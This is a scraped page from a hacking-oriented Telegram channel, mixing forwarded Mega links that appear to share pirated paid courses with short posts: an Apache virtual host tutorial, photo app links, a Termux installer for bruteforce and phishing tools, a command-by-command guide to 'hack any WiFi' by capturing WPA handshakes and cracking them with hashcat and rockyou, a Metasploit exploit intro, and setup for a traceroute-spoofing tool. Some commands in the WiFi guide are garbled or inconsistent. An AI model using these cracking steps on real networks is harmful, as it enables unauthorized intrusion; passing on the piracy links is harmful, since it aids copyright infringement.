UNDERCODE SECURITY
225 subscribers
295 photos
1.03K files
1.73K links
πŸ¦‘WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Download Telegram
Forwarded from Backup Legal Mega
πŸ¦‘ Adobe Premiere Pro CC 2019-2020 Edit Amazing Vlogs with Brad

https://mega.nz/folder/VUpGDQzL#9enyhx39yt_zsu1p_CIsTg
πŸ¦‘ANOTHER 2020 TERMUX TOOLS INSTALLER SUCH BRUTEFORCE & PHISHING...
#termux

1) pkg install git

2) pkg install python

3) git clone https://github.com/Zian25/UniTools-Termux

4) cd UniTools-Termux

5) python3 utx.py

6) Choose option via numbers

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Create an Apache Virtual Host tutorial:

πŸ„»πŸ„΄πŸ…ƒ'πŸ…‚ πŸ…‚πŸ…ƒπŸ„°πŸ…πŸ…ƒ :

1) laravel:~$ cd /etc/apache2/sites-available
laravel:/etc/apache2/sites-available$ sudo vi myapp.conf


2) <VirtualHost *:80>
ServerName myapp.localhost.com
DocumentRoot "/home/vagrant/projects/myapp/public"
<Directory "/home/vagrant/projects/myapp/public">
AllowOverride all
</Directory>
</VirtualHost>
ο»Ώ
3) Save the file, then continue below.

laravel:/etc/apache2/sites-available$ cd ../sites-enabled

laravel:/etc/apache2/sites-enabled$ sudo ln -s ../sites-available/myapp.conf

laravel:/etc/apache2/sites-enabled$ sudo service apache2
restart

4) Fixing Permissions
If you’re running a virtual machine under Vagrant, you may want to change the user and group to avoid permission issues.

5) To do this:

laravel:~$ cd /etc/apache2

laravel:/etc/apache2$ sudo vi envvars

6) Change the lines below to contain the desired user and group

export APACHE_RUN_USER=vagrant

export APACHE_RUN_GROUP=vagrant

7) Save the file and restart apache.

laravel:/etc/apache2$ sudo service apache2 restart

unix forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘NEW GOOD PHOTO EDITORS APPS(IOS/ANDROID):

https://itunes.apple.com/us/app/snapseed/id439438619?mt=8

https://play.google.com/store/apps/details?id=com.niksoftware.snapseed&hl=en

https://itunes.apple.com/us/app/snapseed/id439438619?mt=8

https://itunes.apple.com/us/app/vsco-cam/id588013838?mt=8

https://play.google.com/store/apps/details?id=com.vsco.cam&hl=en

https://vsco.co/

https://itunes.apple.com/us/app/prisma-photo-editor/id1122649984?mt=8

https://play.google.com/store/apps/details?id=com.neuralprisma

https://itunes.apple.com/us/app/adobe-photoshop-express/id331975235?mt=8

https://play.google.com/store/apps/details?id=com.adobe.psmobile

https://www.photoshop.com/products/photoshopexpress

https://itunes.apple.com/us/app/foodie-delicious-camera-for/id1076859004?mt=8

https://play.google.com/store/apps/details?id=com.linecorp.foodcam.android&hl=en

https://itunes.apple.com/us/app/foodie-camera-for-life/id1076859004?mt=8

https://itunes.apple.com/gb/app/adobe-photoshop-lightroom/id878783582?mt=8

https://play.google.com/store/apps/details?id=com.adobe.lrmobile

https://itunes.apple.com/us/app/instacollage-collage-maker/id530957474?mt=8

https://play.google.com/store/apps/details?id=mp.instagcolleage

https://itunes.apple.com/gb/app/adobe-photoshop-fix/id1033713849?mt=8

https://play.google.com/store/apps/details?id=com.adobe.adobephotoshopfix&hl=en_GB

https://play.google.com/store/apps/details?id=to.pho.visagelab&hl=en

https://itunes.apple.com/us/app/visage-perfect-photo-make-app/id489833171?mt=8

https://itunes.apple.com/us/app/afterlight-2/id1293122457?mt=8

https://play.google.com/store/apps/details?id=com.fueled.afterlight&hl=en

https://play.google.com/store/apps/details?id=com.canva.editor

https://play.google.com/store/apps/details?id=com.advasoft.touchretouch&hl=en

https://itunes.apple.com/us/app/touchretouch/id373311252?mt=8

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
rating 4.6 Feature Engineering for Machine Learning

https://mega.nz/folder/FAwFQbrb#CQPxWKT1iM-cboK-ORe4DA
Forwarded from Backup Legal Mega
Forwarded from Backup Legal Mega
Forwarded from WEB UNDERCODE - PRIVATE
VIDEOS RANDOM HACKING .pdf
3.2 MB
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACK ANY WIFI WPA-WPA2 VIA AIRCRACK :

1) Enter Password to Log In
Enter your root password to enable access. After entering the login password, press the Enter button to continue.

2) Install aircrack-ng
Soon after logging in, press the Y button. This will enable the installation of aircrack-ng.

3) Turn on airmon-ng
Airmon-ng is the software used to convert the managed mode into the monitor mode. Use the following command to turn on airmon-ng:

$ airmon-ng

4) Find Monitor Name
The next step is to find the monitor name to continue hacking. You can view the monitor name in the interface column. In some cases, you may not be able to view the monitor name. This error occurs if your card is not supported.

5) Begin Monitoring the Network
Enter the following command to begin the monitoring process:

$ airmon-ng start wlan0

6) If you are targeting some other network, then you should replace β€˜wlan0’ with the correct network name.

Enable Monitor Mode Interface
The following command is used to enable the monitor mode interface:

$ iwconfig

7) Kill Processes that Return Errors
Your system may cause some interference. Use the following command to remove this error.

$ airmon-ng check kill

8) Review Monitor Interface
The next step is to review the monitor name. In this case, it is named β€˜wlan0mon.’

Get Names of All Routers
The names of all available routers will appear after you enter the following command.

$ airodump-ng mon0

9) Find the Name of the Router
You will first need to find the name of the specific router that you want to hack.


10) Ensure that the Router Uses WPA or WPA2 Security
If the WPA name appears on the screen, then you can continue hacking.

Note the MAC address and channel number.

11) Monitor the Selected Network
Use the following command to monitor the details of the network you want to hack.

$ airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0

Wait for Handshake
Wait until you see β€˜WPA HANDSHAKE’ written on your screen.

12) Exit the window by pressing CTRL+C. A cap file will appear on your computer screen.

Rename the cap File
For your ease, you can edit the name of the file. Use the following command for this purpose:

$ mv ./-01.cap name.cap

13) Convert File into hccapx Format
You can convert the file into hccapx format easily with the help of the Kali converter.

Use the following command to do so:

$ cap2hccapx.bin name.cap name.hccapx

14) Install naive-hash-cat
Now, you can crack the password by using this service. Use the following command to begin cracking.

$ sudo git clone https://github.com/brannondorsey/naive-hashcat
$ cd naive-hash-cat


$ curl -L -o dicts/rockyou.txt
Run naive-hash-cat

15) To run the naive-hash-cat service, enter the following command:

$ HASH_FILE=name.hccapx POT_FILE=name.pot HASH_TYPE=2500 ./naive-hash-cat.sh


Wait for the Network Password to Be Cracked
As soon as the password is cracked, it will be mentioned in the file. This process can take months or even years to complete. Enter the following command when this process gets completed to save the password. The cracked password is shown in the last screenshot.
[cc lang=”bash” width=”780β€³]
$ aircrack-ng -a2 -b MAC -w rockyou.txt name.cap

enjoyβ€οΈπŸ‘πŸ»
ru-en forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
πŸ¦‘Digital Character Illustration Create A Memorable Whimsical Character

https://mega.nz/folder/JchEiIjR#7-i0-CGrqxzYAh6z-Voa2Q
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Types of Exploits
Types of Exploits in Metasploit:

1) Active

2) Passive

> The core difference between these two exploit types is that the active type exploits a specific target before it terminates, whereas the passive type waits until an incoming host connects before exploiting. It helps to know these beforehand, as the difference will play a clearer role when you graduate to writing more complicated exploits.

- Setup
The software we will use in this tutorial include the following:

1) The exploit: For the purpose of this short guide, we will be using a pre-existing vulnerability in the freefloat FTP server.

Immunity debugger: This is used in creating exploits and reverse-engineering binary files. You can easily come by a good debugger available online for free.

2) Windows XP service pack 3 installed

Kali Linux: Obviously, the undisputed leading pen testing aid.

Mona.py: A Python-based plugin that helps with immunity debugging. Download Mona.py and move it to the immunity debugger directory (the py command folder).

ruforum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
Wix Web Designing and Development Beginner to Pro -1.89 GB-

https://mega.nz/folder/VIo1nCCQ#aC5h7hbTvTXoQ-S2Pl_mbA
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘IP SPOOFING :

Simple traceroute fake hop generator through IP spoofing

IP packet headers contain a one byte time to live (TTL, IPv4) or hop limit (HL, IPv6) field which is supposed to be decreased by every router on the packet's path in order to prevent infinite circulations. Initially, the sender populates the packet with a sufficiently large value. Most routers signal the expiry of the TTL by replying with an ICMP "TTL expired" packet to the packet sender. Tracerouting works by sending out packets with increasing TTL. The first router will drop the packet with TTL 1 and send an ICMP reply, the second router will drop the packet with TTL 2 and so on. By simply dropping all packets with a TTL below a certain threshold N at the last hop, it will appear as if N hops, that do not reply with ICMP packets, had been inserted. The fakeroute.py script uses a raw socket to capture packets with low TTL and relay them to a server in a data center without egress filtering (i.e. where packets with spoofed source IP address are not filtered). The spoof.py script receives these low TTL packets and generates ICMP replies for them from fake source IP addresses.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/blechschmidt/fakeroute.git

2) cd fakeroute

3) pip3 install -r requirements.txt

4) Copy iptables.sh and fakeroute.py to the server which you want to fake the traceroute of and run them

5) spoof.py is to be run on a server in a data center without egress filters. Make sure to adapt MAC addresses, interface names, TTL threshold etc. inside all scripts

USE FOR LEARN

βœ…git topic
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁